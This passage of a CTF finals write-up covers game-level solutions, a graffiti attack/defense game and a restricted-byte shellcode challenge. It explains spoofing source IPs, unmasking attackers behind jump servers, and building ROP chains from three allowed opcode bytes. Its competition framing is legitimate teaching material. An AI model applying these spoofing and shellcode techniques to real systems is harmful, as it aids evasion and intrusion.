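The address arithmetic behind this chain can be double-checked with a few lines of Python. This is only a sanity check of the numbers quoted above, not the tooling we used, and it assumes that the upper three bytes of the dword loaded from 0xa1 were zero, which is implied by the 0xf1 result but not something I verified.

```python
# Sanity check of the addresses quoted in the write-up (not the original tooling).
TARGET = 0xF3                  # address of the 0x81 byte that should become 0x80

# First idea: dec DWORD PTR [ecx+0xc1] needs ecx = 0x32.
assert 0xC1 + 0x32 == TARGET

# Second idea: mov al, 0x61 ; or eax, [eax+0x40] ; inc eax ; inc eax
eax = 0x61
assert eax + 0x40 == 0xA1      # the OR operand is read from 0xa1
loaded = 0x90                  # byte at 0xa1; upper bytes assumed to be zero
eax |= loaded                  # 0x61 | 0x90 = 0xf1
eax += 2                       # two inc eax
assert eax == TARGET

# mov bl, [eax] ; dec ebx ; mov [eax], bl
bl = (0x81 - 1) & 0xFF
print(hex(eax), hex(bl))
```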

NetMaze

Really the simplest non-gaming level here. All I did was write a DFS to walk randomly, and before long I found a path from the top-left to the bottom-right corner of the maze.

The only catch was that the console output was not consistent. Sometimes even if the game displayed the segfault screen, the console would not output a line saying segfault. So I patched the source script a bit so that the output was consistent with the actual state.

Bub and Bob

Another pure game level. Our solution was something like this:

Fall from the left and push ball is stop all the way to the right so that bub is stop extends out.
Ride the bubble back to the top.
Fall from the right and bring bub down.
Repeat 2 and 3 and bring is down.
Form bub is you horizontally so you can control the little green dragon (called bub). At the same time break zero is you.
Move bub to the middle of the screen and push up the middle is so cpu is run is in effect.
Push ball is back out from right to left, and push them from bottom to the top of the screen.
Prepare ball is at the right of cpu is x64, but don’t connect them yet.
At the right timing, connect ball is cpu and move straight to the start of the shellcode (starting at 83). Once the bubble is produced it will turn into the CPU and start running.

Let it run to the end and we’re done. Unfortunately, at the exact moment we solved this level, the server went down, and that marked the end of day 1.

Here are the solutions to all 15 levels: Zero is You | 15 solutions - YouTube.

Optimization

While a bunch of people were trying to solve the puzzle, another group of our KoH players was doing their best to try to optimize the existing solutions. Other than trying to optimize by hand, they wrote a fuzzing tool to randomly (maybe with a heuristic) delete a part out of the solution or replace a part with a smaller part.

With their effort, we successfully shrank many of our past solutions. However, with the game’s scoring method, every 5 moves we saved would only give us 1 point. That being said, this fuzzing method paid off on the final day……

Overall, we didn’t do well on the first day. Everyone was so good at playing games and we just weren’t fast enough. We were able to get to fifth place by the time the game ended, but the way the KoH score works meant that all the teams above us were far ahead. We had to catch up in the following days!

www

This King of the Hill game combined Attack/Defense, Penetration Testing, and maybe even Web altogether. A really messy experience, but in a fun way.

The Rule

The rule was simple: at each round, each team could use a flag string to exchange for a graffiti string. The graffiti string could then be put onto other teams’ walls. Each team would get 1 point if they put a graffiti string onto some other team’s wall.

The twist was, if a team could figure out which team put a graffiti on their wall, and that team’s real IP, they could accuse the team of vandalizing. If the accusation was successful, not only would the 1 point that team got for putting up the graffiti be gone, they would also be deducted 4 points for vandalizing (and being spotted).

There were two APIs on each team’s server:

/graffiti_store, using which we could exchange a flag string for a graffiti string.
/accuse, which could be used to report a graffiti and ip.

And each team would have a game box that needs to be ssh’d in. Within the game server, the port 1337 of each team’s box was the wall. Connecting to it, a team could spray their graffiti onto others’ walls.

There were three more rules for the fairness and effectiveness of the game:

Teams could accuse retrospectively up to 6 rounds back in the past.
A team only had one chance to accuse a certain graffiti.
A team had to pass services availability check each round, otherwise 15 points would be deducted that round.

The Observation

Here are a few thoughts and observations we had after we read the rules, logged onto our game box, and tried to manually spray graffiti onto other teams’ walls and accuse other teams’ graffiti.

We have the IP address 13.37.228.64, and other teams are scattered around in 13.37.xx.64. This xx did not correspond to the team ID, therefore a scan of the subnet is needed to find out other teams’ machines. However, when accusing, you only need to report the IP of each team’s box inside the network, not the IP that each team has that contains their team ID (i.e. not 10.13.37.xx).
There’s a folder in the game box that includes a flag file and a bunch of pcaps. The flag content will change every round.
The IP address that we used to spray graffiti (i.e. the source of the TCP connection) is recorded along with the graffiti string itself. This means that if we were to simply use our real IP address to spray graffiti, and other teams had an automatic accusing system, we would certainly get points deducted.
From 3, it was definitely a dominated strategy to spray graffiti with a team’s real IP. Therefore, there must be some way to hide a team’s real IP. Combining this with the challenge’s description and a later hint, there were definitely some machines out there in the game network that we could take control of.
Furthermore, there must be other flags on these pwnable servers that we could use to buy graffiti with. This was also hinted at in the rules of the game.
Continuing 4, there must be a way to spot the real IP of the vandalizing team, even if they used a jump/zombie server to spray graffiti. In other words, there must be a way to map jump/zombie servers’ IPs back to the real IP of the team, assuming each jump server is used by only one team.

Even though we knew that it was not a good strategy to spray graffiti with our real IP, we still had a chance to get some points this way before anyone had time to write an auto-accusing script and before we successfully pwned a service. We could always turn this off once we started to see our points being deducted.

Quickly, I started writing a script to automatically acquire the flag string, exchange it for a graffiti and spray it onto every other team’s wall. We ran into a few annoying things once we started:

The graffiti exchange endpoint is outside the game server, so I had to port forward it using SSH.
The SSH server has a really short ClientAliveInterval, so we had to manually adjust the ServerAliveInterval from our SSH Client.
There’s a maximum connection limit for the SSH port. So one of us had to do a proxy and let everyone else connect to it via that.

While I was writing that, one of my teammates was writing an accusing script. Other members of KoH were then scanning the subnet and trying to find other machines that we could take over.

The Turnabout

While my spraying script was running, some of my teammates noticed an interesting thing: if you used a flag string from a past round to exchange for a graffiti this round, you would get a completely new graffiti without any error message. Since the rules clearly said that both the flag and the graffiti last for only one round, I thought it might just be a bug, and that you couldn’t really get a point using a graffiti string exchanged from an expired flag.

Nonetheless, there was no downside to collecting all the past flags, so I quickly added more code to my script so that it would collect the current flag and save it along with all the past ones. At every new round, the script would exchange all the saved flags for graffiti strings and spray them onto every other team’s wall.

This completely changed the game. Spraying graffiti exchanged with a flag from a past round actually counted as a successful spray. This meant that for any team that knew about this bug, the points gained per round could grow linearly: assuming a team has $c$ “flag sources” (one plus the number of machines the team took over) and had been collecting flags for $n$ rounds, they could get $c\cdot n$ points in that round, and in total their points would be on the order of $\Theta(c\cdot n^2)$.
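To make the growth concrete, here is a tiny Python sketch of that estimate. It simply counts one point per stored flag per round, as in the estimate above; the function names are made up for illustration, and it ignores accusations and the number of walls sprayed.

```python
def points_in_round(sources: int, rounds_collected: int) -> int:
    """Points gained in one round with `sources` flag sources after n rounds."""
    return sources * rounds_collected


def total_points(sources: int, rounds: int) -> int:
    """Cumulative points after `rounds` rounds: c * n * (n + 1) / 2."""
    return sum(points_in_round(sources, n) for n in range(1, rounds + 1))


for n in (10, 20, 40):
    print(n, points_in_round(1, n), total_points(1, n))
```

Doubling the number of rounds roughly quadruples the total, which is the $\Theta(c\cdot n^2)$ behavior described above.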

Even without a second machine, we could see our points grow faster than ever. As long as there was no further progress on pwning other machines, this was the only hope we had.

The Smoke

During this time, we were kind of worried (and almost certain) that some other team had an auto-accusing script running, and that we would get more points deducted if we were to spray more graffiti. Therefore, we wrote a “smoking” machine, which basically just generated random hex strings that looked like graffiti strings but were in fact counterfeits, and sprayed them onto other teams’ walls.

This way, the real graffiti strings would be hidden within a pool of fake ones. We thought that teams whose scripts were not good enough would have a hard time accusing, because there were too many accusations they had to make. This should also make it harder to analyze our behavior.
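A minimal sketch of such a decoy generator might look like the following. The 32-character length, the lowercase hex format, and the function names are assumptions for illustration; the real graffiti format is not reproduced here, and this is not our actual script.

```python
import random
import secrets


def make_decoys(count: int, length: int = 32) -> list[str]:
    """Random hex strings of `length` characters (length assumed to be even)."""
    return [secrets.token_hex(length // 2) for _ in range(count)]


def hide_among_decoys(real: list[str], decoys_per_real: int = 10,
                      length: int = 32) -> list[str]:
    """Mix the real graffiti strings into a shuffled batch of counterfeits."""
    batch = list(real) + make_decoys(decoys_per_real * len(real), length)
    random.shuffle(batch)
    return batch


batch = hide_among_decoys(["ab" * 16], decoys_per_real=3)
print(len(batch))
```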

Or at least that was the hope. As for whether it had any effect or not, we didn’t know.

The Fake IP

Spoiler alert: till the end of the game, we weren’t able to find or pwn any other services. However, that doesn’t mean we didn’t get our own fake IP to spray graffiti with.

@cbmixx realized that, since we had root privileges on our own machine, it was possible to give ourselves another IP within a subnet that we had control over.

I don’t quite remember what exact prefix we had control over; it might have been /26 or something.

After some trials, we were able to assign our machine a new IP address, 13.37.228.65 (and later 13.37.228.66). After adding a rule to iptables, all our outgoing traffic to port 1337 of other teams’ machines went through the new IP address. For teams with an automated accusing script, this should prevent them from accusing us for a long time.

However, one big downside of this was that if any team were to analyze the graffiti logs manually, they would soon discover what was going on and map our fake IP back to the real IP, because they share the same prefix. Nonetheless, this was the best we could do.

The Accusation

Our connection to the game VPN was shut off by the admin, who said we had too much traffic going through the network and that we were DoSing the server. After spending some time figuring out where the traffic was coming from, we realized that our accusing script was acting way too aggressively, so we had to take it down for a moment.

@mcfx moved the accusing script to his local machine and only periodically pulled data from the remote server. He then analyzed the data all by himself, and wrote a script to automatically map jump server IPs back to the real IPs. He was able to figure out all the big players’ real IPs and their jump servers. I believe he was the sole reason why PPP and Katzebin lost so many points.

There were many ways to find the real IP behind the jump server, although I’m not sure what exact method @mcfx used. Nonetheless, I’ll talk about what my idea was:

Assuming we saw an IP without knowing the real IP behind it, we could set up a list of all possible real IPs behind it. The first time we met this IP, the list was just all other teams’ IP addresses. Then, for each graffiti that was sent out using that IP, we could try to accuse it with one of the IP addresses still on the list. Whenever the /accuse endpoint told us the accusation failed, we crossed that IP off the list, until we hit an IP that we accused successfully.
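In code, my idea could be sketched roughly like this. The `accuse` callback is a hypothetical wrapper around the /accuse endpoint that returns whether the accusation succeeded, and the IPs in the example are made up. Since each graffiti can only be accused once, every guess consumes one graffiti sprayed from the unknown IP.

```python
def unmask(graffiti_from_jump_ip, candidate_ips, accuse):
    """Try candidates one by one, spending one graffiti per guess.

    `accuse(graffiti, ip)` is a hypothetical helper returning True on success.
    Returns the real IP, or None if we run out of graffiti or candidates.
    """
    remaining = list(candidate_ips)
    for graffiti in graffiti_from_jump_ip:
        if not remaining:
            break
        guess = remaining.pop(0)      # cross the guess off the list
        if accuse(graffiti, guess):
            return guess
    return None


# Toy run with a fake endpoint that knows the answer.
real_ip = "13.37.3.64"
fake_accuse = lambda graffiti, ip: ip == real_ip
teams = ["13.37.1.64", "13.37.2.64", "13.37.3.64", "13.37.4.64"]
print(unmask(["g1", "g2", "g3", "g4"], teams, fake_accuse))
```

With $k$ candidate teams this needs at most $k$ graffiti from the same jump server, which the spamming teams were happy to provide.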

During the game, I had a real evil thought: How about we tell other teams what is the real IP address behind each jump server, so that they could help with accusing the big teams and taking them down. Maybe I could publicize it in the Discord chat or spray it onto other teams’ walls. However, that would probably be violating some rules, or at least not so moral, and didn’t sound like a correct thing to do, so we didn’t do it.

The Avoidance

After some time, we could see that our points no longer grew as rapidly, so some teams must have started to find out our fake IP address and accuse us with the real one. Exploiting the rule that you can only accuse graffiti that was sprayed on your own team’s wall, we had two ideas:

Spray randomly to only a portion of the teams and record whom we sprayed. We could then check our scores to find out whom we should stop spraying.
Only stop spraying the big players we found, since they have the largest chance of finding out our real IP as well.

The first one seemed to be a good idea, but really hard to implement. First of all, the scores are lagging behind, so in reality we would have to wait for a lot of rounds to get the data we need. Furthermore, the data is really noisy, and we have to do this for many rounds to be sure. Therefore, I didn’t go with it.

Instead, for the second idea, since we had already identified some of the big players out there, we could just stop spraying them and quickly check if we indeed got more points. We picked the two largest teams (the ones who owned the most jump servers), which had the real IPs 13.37.109.64 and 13.37.238.64, and stopped spraying them.

At first it didn’t seem to work, but after the scoreboard caught up with the round where we implemented this idea, we saw our score increase drastically, and the score we gained each round then surpassed that of PPP and Katzebin.

The Countermeasure

After a while, we realized that the big teams had stopped attacking us as well, probably due to the same thought process as above. However, there was actually a way to counter that. Let’s first review what we knew:

In order to successfully accuse some team, we needed to present an (IP, graffiti) pair, with the restrictions being that

We knew the real IP address of the WWW game box, which the team that exchanged this graffiti owned.
That graffiti was sprayed onto our wall.

If people stop spraying us, then clearly we couldn’t do anything about it, right?

Notice one thing: we could see other teams’ walls as well. This means that even if some team doesn’t spray us in some round, they would spray someone else and their graffiti would be left there for anyone to see.

Then, one of our team members had a crazy thought: we could take the graffiti that the team sprayed on other teams’ walls and spray it onto our own wall. This idea had two implications:

This must be counted as a point for that team, because the system had no way to tell whether we sprayed it onto our own wall or the other team took control of our machine and sprayed the graffiti onto ours.
Since 1 must work, then we definitely can successfully accuse that team for spraying, because it satisfies the above 2 restrictions.

We quickly tried out whether this really worked, and it did. Hence, for teams that didn’t want to get accused, the best thing to do was probably to stop spraying. In the final hours of the game, both PPP and Katzebin stopped spraying, and we were the only team that still had a growing score.

The Reset

At one point in the game, we suddenly lost all connections to the game box. At first we thought it was just a connection issue, so we waited a bit, but it didn’t come back on its own. I started to panic, because all of the saved flags were stored on the server, and we had to at least get the file back before resetting the machine. So we sent out a ticket, hoping that the admin could help us sort out the issue.

However, almost 10 minutes after we lost connection to the server, there was still no progress on the matter, and we couldn’t afford to lose more points. We had accumulated about 40 flags at this point in the game, and a reset meant we would have to start from zero.

Just when we were stressing about whether to wait for the admin’s support or just reset the machine, one of the team members found the content of the flags file in his terminal history, from a cat /flags command that might just save us. After checking the content, we confirmed that it was relatively recent and contained enough flags for us to get back to where we were. We backed up that content and immediately reset our machine.

But that’s not the end.

The Second Reset

When we first lost connections to the server, we were kind of suspecting that another team hacked our box, but we didn’t know. We knew that there were SSH weak password issues, but we weren’t able to log into anyone’s machine using that weak password, and we had changed our SSH password from the beginning.

However, not long after we reset our machine, we were suddenly kicked off the server again. This time, it wasn’t that we couldn’t connect to the SSH port; instead, the SSH server kept telling us the password was wrong. We were sure that we were getting hacked, and that was really scary.

We quickly reset our machine again, and the moment we logged in, we not only changed all the users’ passwords, including the main one, but also disabled the apache server. This might make us fail the service availability check, but that was only 15 points per round, and the score we gained each round was much more than that.

After that, our connections were fine, so that was the end of this brief interlude.

The End

An hour before day two ended, almost everyone’s score stopped increasing, except for ours. In the end, we even climbed to second place, only about 2000 points behind PPP. I would say that’s impressive considering we didn’t pwn any server at all.

There was also one point in the game where nobody scored for some reason. I think that’s because the /graffiti_store endpoint was down, but I don’t think it was down for that long. It remains a mystery.

shooow-your-shell

After day two ended, a KoH homework was released. The name was shooow-your-shell and obviously from the name it was yet another shellcode challenge. Nine hours before day three started, we began to work on this challenge.

Looking at the Python code and disassembled runner, we understood how the game worked:

Each time a team can submit a hex-encoded shellcode. The shellcode can be written in x86_64, arm64 or riscv64 architecture.
The game will try the shellcode on all three architectures each time, and if any of them reads the file content from /secret and prints it to stdout, the submission is deemed a success.
The shellcode is executed using qemu-user-static, chrooted into a temporary folder and run as a non-root user.
However, there are some restrictions about the shellcode a team can submit:
- At any time of the game, there would be a set of blocked bytes $B\subseteq \{\texttt{0x00},\texttt{0x01},\cdots,\texttt{0xFF}\}$. The submitted shellcode cannot contain any of the blocked bytes.
- Compared to the last accepted submission $S_l$, the new shellcode $S_n$ must satisfy either:
  - $\{S_l\dots\} \setminus \{S_n\dots\} \neq \varnothing$ (the new shellcode did not use at least one byte the last accepted shellcode used), or
  - $\vert S_l\vert > \vert S_n\vert$ (the new shellcode is shorter than the last accepted shellcode in length).
  Where $S_l$ and $S_n$ are both strings of shellcodes, and $\{S\dots\}$ is a set containing bytes used in a shellcode $S$.
If the shellcode was then accepted, the newly blocked bytes will be $B_n = B \cup \left(\{S_l\dots\} \setminus \{S_n\dots\}\right)$. That is, all bytes that are not used by the new shellcode but were used by the old one will be blocked.
The team with the latest accepted shellcode would be viewed as “the top of the hill.” The team cannot submit more shellcode if they were the top of the hill.
The newly accepted shellcode would then be appended into history, where the leaderboard is calculated as a reverse of the history. That is, the team with the latest accepted shellcode would be #1, the team that took the top of the hill before them would be #2, so on and so forth.
Each time the Python script would read past information from history, and write to it if the shellcode is accepted.
If a team stayed on the top of the hill for more than 900 seconds (or 15 minutes), then that team would be regarded as a “winner,” and the game would reset. However, one random byte of the winner’s shellcode would be part of the new game’s initial banned bytes $B$. This applied to all past winners.
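The byte-related part of these rules can be summarized in a short Python sketch. This is my own restatement, not the organizers’ script: the name `try_submit` is made up, and it does not model whether the shellcode actually prints /secret, the top-of-the-hill check, or the 900-second reset.

```python
def try_submit(last: bytes, new: bytes, blocked: frozenset):
    """Return the updated blocked set if `new` is accepted, else None."""
    if blocked & set(new):
        return None                      # uses a blocked byte
    dropped = set(last) - set(new)       # bytes of S_l that S_n avoids
    if not dropped and len(new) >= len(last):
        return None                      # neither drops a byte nor is shorter
    return blocked | dropped             # B_n = B ∪ ({S_l...} \ {S_n...})


last = bytes.fromhex("0505c350c350c3")
print(try_submit(last, bytes.fromhex("0505"), frozenset()))
print(try_submit(last, last, frozenset()))
```

Note that a shorter shellcode using exactly the same byte set is accepted without blocking anything new.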

The rules are pretty clear, but we also had some doubts:

The history file was read at the start of the script and overwritten when the new history was saved, so there was clearly a race condition: open two connections $A$ and $B$ at the same time, and submit an acceptable shellcode to $A$ so that the history is overwritten. Because the script reads the history only at startup, $B$ still sees the history as it was when the connection opened, and would accept a shellcode that may not be acceptable for the current history. If we now submit a shellcode to $B$ and it is accepted, $B$’s connection overwrites the history again as if $A$ never happened.
There must be a way to sync up the files between each team’s boxes, or everyone would be seeing their own version of history and there would be no point to the game anymore. There’s also the possibility that everyone is playing on the same server, but that’s highly unlikely according to @riatre.
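The suspected race in the first doubt is a classic lost update. Here is a toy Python model of it, where a list stands in for the history file and `session` is a made-up stand-in for one run of the game script; it only illustrates the read-at-start, overwrite-at-end pattern we suspected.

```python
def session(snapshot, team):
    """Validate against the snapshot read at connect time, then overwrite."""
    return snapshot + [team]


history_file = ["old-top"]

# Both connections open (and read the history) before either one submits.
snapshot_a = list(history_file)
snapshot_b = list(history_file)

history_file = session(snapshot_a, "A")   # A is accepted and saved
history_file = session(snapshot_b, "B")   # B overwrites with its stale view

print(history_file)   # A's entry is gone
```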

But there’s no way to know before the game started, so we went on with our preparation.

Preparation

We first started by writing a few different shellcodes. There were shellcodes that used syscalls directly, shellcodes that called functions statically linked into the binary, and shellcodes that pushed a ROP chain onto the stack and returned. Nothing quite out of the ordinary here.

Three-Byte Shellcode

Until @meowmere sent a shellcode that blew all of us away. In his shellcode, there were only 3 bytes used, 0x05, 0x50, and 0xc3. Quickly we disassembled the shellcode and understood how it worked:

The shellcode simply pushed a ROP chain onto the stack and returned, but it was written in such a way that all the values were built up by additions in a register. Therefore only three basic instructions were used:

add eax, imm32, which is 0x05 followed by the four bytes of the immediate value,
push rax, which is 0x50, and
ret which is 0xc3.

And for the add instruction, the immediate values consisted of only these 3 bytes, so the whole shellcode used only these three bytes. Of course the values in the ROP chain contain bytes outside of these 3, but amazingly, by combining numbers made up of these 3 bytes with modular arithmetic (which every computer comes with), we can actually add them up to the number we want.

For example, if we want a number 0xd093cffa to be pushed onto the stack, then we can have:

add eax, 0xc350c305
add eax, 0xc350c305
add eax, 0xc350c350
add eax, 0xc350c350
add eax, 0xc350c350
push rax

And the assembled shellcode for this would consist only of the aforementioned 3 bytes. This works because

\[(\text{c350c305})_{\text{hex}} \cdot 2 + (\text{c350c350})_{\text{hex}} \cdot 3 \equiv (\text{d093cffa})_\text{hex} \mod 2^{32}\]
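This is easy to double-check in Python. The sketch below assembles the five add instructions and the push by hand (0x05 followed by the little-endian immediate, then 0x50), verifies the byte set, and recomputes the sum. It assumes eax starts at 0, as in the example.

```python
import struct

ALLOWED = {0x05, 0x50, 0xC3}
addends = [0xC350C305] * 2 + [0xC350C350] * 3

# add eax, imm32 is opcode 0x05 followed by the 4-byte little-endian immediate.
code = b"".join(b"\x05" + struct.pack("<I", imm) for imm in addends)
code += b"\x50"  # push rax

eax = sum(addends) % 2**32   # 32-bit wraparound, eax assumed to start at 0
assert eax == 0xD093CFFA
assert set(code) <= ALLOWED  # only the three bytes appear in the shellcode

print(code.hex())
```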

I’m not good at number theory, so I can’t tell whether 32-bit numbers made up of these 3 bytes can add up to any number within the 32-bit range modulo $2^{32}$. That being said, the example above shows that they can add up to at least some numbers, so it’s time for some math.

Find Values that Add Up to the Target

We have an alphabet $A$ that consists of numbers from $[0,\vert A \vert)$, a set of usable symbols $B \subseteq A$, and a target string $T$ of length $s$. We represent $T$ as a base-$\vert A\vert$ number, that is, $T = \sum_{i=0}^{s-1} {\vert A\vert }^{i} T_i$.

We want to find a list of numbers $[n_1, n_2, \cdots, n_i]$ such that $T \equiv \sum_i n_i \mod \vert A\vert ^s$ and $n_i=\sum_{j=0}^{s-1} \vert A\vert ^{j}\cdot n_{ij}, n_{ij} \in B$, i.e. each $n_i$ consists only of symbols from $B$ in its base-$\vert A\vert$ representation as a string.

Although it is possible to generate all possible values of $n_i$ (such a set has a size of $\vert B\vert ^s$), it is very hard to find a combination of them that adds up to $T$. With breadth-first search, at search depth $d$ there will be $O\left(\vert B\vert ^{sd}\right)$ values, and there could be as many as $\vert A\vert ^s$ different sums, only a few of which are what we need. Therefore, we need to find a way to search for these values quickly.

We have

\[\begin{align} T &\equiv \sum_i n_i &\mod |A|^s\\ &\equiv \sum_i\sum_{j=0}^{s-1} |A|^j\cdot n_{ij} &\mod |A|^s\\ &\equiv \sum_{j=0}^{s-1} \left(|A|^j \cdot \sum_{k=1}^{|B|} b_k c_{jk} \right)&\mod |A|^s&& \text{where }c_{jk} = \sum_i[n_{ij} = b_k]\\ \end{align}\]

where $n_{ij}$ is the $j$-th symbol of string $n_i$. A constraint we must add is

\[\exists i \in \mathbb{Z}^+, \forall j \in [0, s), \sum_{k=1}^{|B|} c_{jk} = i\]

That is, we must have the same number of symbols at each position of the string; otherwise we would have to pad the string with $0$, which might not be in $B$. To find the optimal answer (the one that produces the shortest list of $n_i$), we just need to find the minimum such $i$. Also, it is easy to see that $i$ has an upper bound of $\vert A\vert \cdot \vert B\vert$, since each symbol at each position needs to appear at most $\vert A\vert$ times.

Notice that we represented $T$ as a number, that is:

\[T =\sum_{j=0}^{s-1}|A|^j \cdot T_j \equiv\sum_{j=0}^{s-1} \left(|A|^j \cdot \sum_{k=1}^{|B|} b_k c_{jk} \right)\mod |A|^s\]

where $T_j \in A$. That means we have

\[\begin{align} T_0 &\equiv\sum_{k=1}^{|B|} b_k c_{0k} &\mod |A|\\ T_1 &\equiv \sum_{k=1}^{|B|} b_k c_{1k} + \left\lfloor\frac{\sum_{k=1}^{|B|} b_k c_{0k}}{|A|}\right\rfloor&\mod |A|\\ T_2 &\equiv \sum_{k=1}^{|B|} b_k c_{2k} + \left\lfloor\frac{\sum_{k=1}^{|B|} b_k \left(c_{0k} + |A| \cdot c_{1k}\right)}{|A|^2} \right\rfloor&\mod |A|\\ \dots\\ T_d &\equiv \left\lfloor \frac{\sum_{p=0}^d |A|^p \sum_{k=1}^{|B|} b_k c_{pk}}{|A|^d} \right\rfloor &\mod |A| \end{align}\]

Now we have turned the task from brute-forcing a list of $n_i$s into brute-forcing the $c_{jk}$s. For each byte of $T$, we have at most $\vert A\vert ^{\vert B\vert }$ different combinations for $\sum_{k=1}^{\vert B\vert } b_k c_{jk} \mod \vert A\vert$, and assuming they are distributed evenly over the range, there are $\approx \vert A\vert ^{\vert B\vert -1}$ ways for them to sum up to any specific symbol, which makes the search space much more acceptable when $\vert B\vert$ is small. Furthermore, we can cache all the values that $\sum_{k=1}^{\vert B\vert } b_k c_{jk} \mod \vert A\vert$ can take, so that we can quickly look up the combinations in reverse. The overall search complexity is $O\left(s\cdot\vert A\vert ^{\vert B\vert -1}\right)$ (a very loose bound).

The pseudocode for the above procedure, without optimization:

input Target, UsableSymbols, Alphabet
a := size(Alphabet)
b := size(UsableSymbols)

# T is what is left of the target, i is the number of addends,
# depth is the current symbol position (least significant first)
def Search(T, i, depth, path)
  if depth == length(Target)
    return path
  end
  for each (c_1, c_2, ..., c_b) such that
      sum(c_1, ...) == i and
      ({c_1, ...} <dot product> UsableSymbols) mod a == T mod a
    # the difference is a multiple of a, so the division is exact and carries over
    answer := Search((T - {c_1, ...} <dot product> UsableSymbols) / a, i, depth + 1, append(path, (c_1, ...)))
    return answer if not nil
  end
  return nil
end

for i from 1 to a * b
  answer = Search(Target, i, 0, [])
  return answer if not nil
end
output "no answer"

In this specific case, our alphabet is the set of possible byte values, i.e. 0x00, 0x01, …, 0xff, so 256 of them. Our usable symbols depend on which operations we need. In the case of add eax, push rax and ret, our usable bytes are 0x05, 0x50, and 0xc3 respectively. Therefore, using this algorithm, given a number $T$ within the range of $2^{32} = 256^4$, we are able to build a minimal list of numbers that sum up to the target number and contain only 0x05, 0x50, and 0xc3 in their 4-byte hex representation. Let $f(T)$ be the optimal (minimal) size of such a list for a given $T$.
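For reference, the unoptimized search can be written as runnable Python roughly as follows. This is a fresh sketch for this post rather than the script we used during the game; the function names are made up, and it has no caching, so it is only practical when the answer is a short list.

```python
def compositions(total, parts):
    """Yield every tuple of `parts` non-negative ints that sums to `total`."""
    if parts == 1:
        yield (total,)
        return
    for first in range(total + 1):
        for rest in compositions(total - first, parts - 1):
            yield (first,) + rest


def search(target, count, positions, symbols, base):
    """Pick symbol counts per position, least significant position first."""
    if positions == 0:
        return []
    for counts in compositions(count, len(symbols)):
        column_sum = sum(c * s for c, s in zip(counts, symbols))
        if column_sum % base != target % base:
            continue
        # The difference is a multiple of `base`; the quotient carries over.
        rest = search((target - column_sum) // base, count,
                      positions - 1, symbols, base)
        if rest is not None:
            return [counts] + rest
    return None


def find_addends(target, symbols, base=256, positions=4):
    """Return a shortest list of numbers built from `symbols` summing to `target`."""
    for count in range(1, base * len(symbols) + 1):
        path = search(target, count, positions, symbols, base)
        if path is None:
            continue
        # Expand the counts into one column of symbols per position.
        columns = [[s for s, c in zip(symbols, counts) for _ in range(c)]
                   for counts in path]
        return [sum(col[i] * base**pos for pos, col in enumerate(columns))
                for i in range(count)]
    return None


addends = find_addends(0xD093CFFA, [0x05, 0x50, 0xC3])
print([hex(n) for n in addends])
```

For the target 0xd093cffa from the earlier example, this finds a list of five addends, so $f(\texttt{0xd093cffa}) = 5$.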

Here’s my script for adding values that consist of limited bytes up to a target number using modular arithmetic (github.com).

Construct an ADD/PUSH ROP Chain

For a normal hand-written ROP chain, the values on the stack are fixed. However, in a binary executable, there could actually be multiple occurrences of the same instruction sequence, like pop rax; ret or mov dword ptr [rdi], edx; ret. Any address that contains our wanted instructions works equally well in a ROP chain, but since our goal now is to minimize the length of the converted ROP chain, we can look for an optimal combination of values such that they produce the shortest ROP chain after converting them to the add/push format.

Notice that the current rax value is dependent on the last value, for example, our shellcode looks like this:

# rax = 0
add eax, 0x50505050
add eax, 0x50505050
...
push rax # rax = v1
...      # somehow add v2 - v1 to rax
push rax # rax = v2

The add operations between the first push and second push depends on both values of $v1$ and $v2$. Let’s make this more formal:

Given a ROP chain of $n$ values that need to be pushed onto the stack, we have a list of sets $N = \left[V_1, V_2, \cdots, V_n\right]$ where $V_i$ is a set of values that, no matter which being pushed onto the stack, the ROP chain has the same effect. We want to find a solution $(v_1, v_2, \cdots, v_n) \in V_1 \times V_2 \times \cdots \times V_n$ such that

\[\sum_{i=1}^n f\left(v_i - v_{i-1} \mod |A|^s\right)\]

is minimal (where $v_0$ is the initial rax value). A brute-force method that goes through all possible combinations is not ideal, since it requires $\prod_{i=1}^n \vert V_i\vert$ tries. A greedy approach that minimizes $f\left(v_i - v_{i-1} \mod \vert A\vert ^s\right)$ for each $i$ in turn is clearly not optimal. It’s time for dynamic programming then.

Let $F_i(v)$ be the minimal number of add instructions needed so far when the $i$th value on the stack is $v$, so that $F_1(v) = f\left(v - v_0 \mod |A|^s\right)$. For $i \ge 1$ we have

\[\begin{align} F_{i+1}(v) &= \min_{(v_1, \cdots, v_i) \in V_1 \times \cdots \times V_i} \left( f\left(v -v_{i} \mod |A|^s\right) + \sum_{j=1}^{i} f\left(v_{j} - v_{j-1} \mod |A|^s\right)\right)\\ &= \min_{v_i \in V_i} \left(f\left(v -v_{i} \mod |A|^s\right) + \min_{(v_1, \cdots, v_{i-1}) \in V_1 \times \cdots \times V_{i-1}} \left( f\left(v_i-v_{i-1} \mod |A|^s\right) + \sum_{j=1}^{i-1} f\left(v_{j} - v_{j-1} \mod |A|^s\right)\right)\right)\\ &= \min_{v_i \in V_i} \left( f\left(v -v_{i} \mod |A|^s\right) + F_i(v_i)\right) \end{align}\]

And our final answer is to look for $\min_{v_n \in V_n} F_n(v_n)$. The time complexity of this DP is

\[\Theta\left(\sum_{i=1}^n \left(\sum_{(v_i, v_{i-1}) \in V_i \times V_{i-1}} f^t\left(v_i - v_{i-1} \mod |A|^s\right)\right)\right)\]

where $f^t(v)$ is the time needed for the $f$ algorithm to run on input $v$.
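The recurrence above can be sketched in a few lines. This is only an illustration under assumptions: shortest_chain, its parameters and the toy cost function in the usage note are hypothetical names, and the real cost function would be the $f$ defined earlier.

```python
def shortest_chain(candidates, f, v0=0, modulus=2**32):
    """candidates is the list [V_1, ..., V_n]; f(d) is the cost of adding d to rax.
    Returns (minimal total cost, chosen values v_1..v_n)."""
    # best[v] = (F_i(v), path that ends with v); start from the initial rax value.
    best = {v0: (0, [])}
    for V in candidates:
        nxt = {}
        for v in V:
            # F_{i+1}(v) = min over v_i of f(v - v_i) + F_i(v_i)
            cost, path = min(
                ((c + f((v - u) % modulus), p) for u, (c, p) in best.items()),
                key=lambda t: t[0],
            )
            nxt[v] = (cost, path + [v])
        best = nxt
    return min(best.values(), key=lambda t: t[0])
```

With a toy cost f(d) = d*d and a modulus of 100, shortest_chain([[1, 5], [10]], lambda d: d * d, 0, 100) picks 5 and then 10 for a total of 50, whereas a greedy choice of 1 first would cost 82.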

Therefore, using this strategy, we were able to generate a three-byte shellcode of minimal length. That’s not the end. We knew the rule well that a winner’s shellcode would be banned, so there are some alternatives to the method:

If 0x05 is banned, we could use 0x2d (sub eax) or 0x15 (adc eax). Although the analysis above would be a bit different.
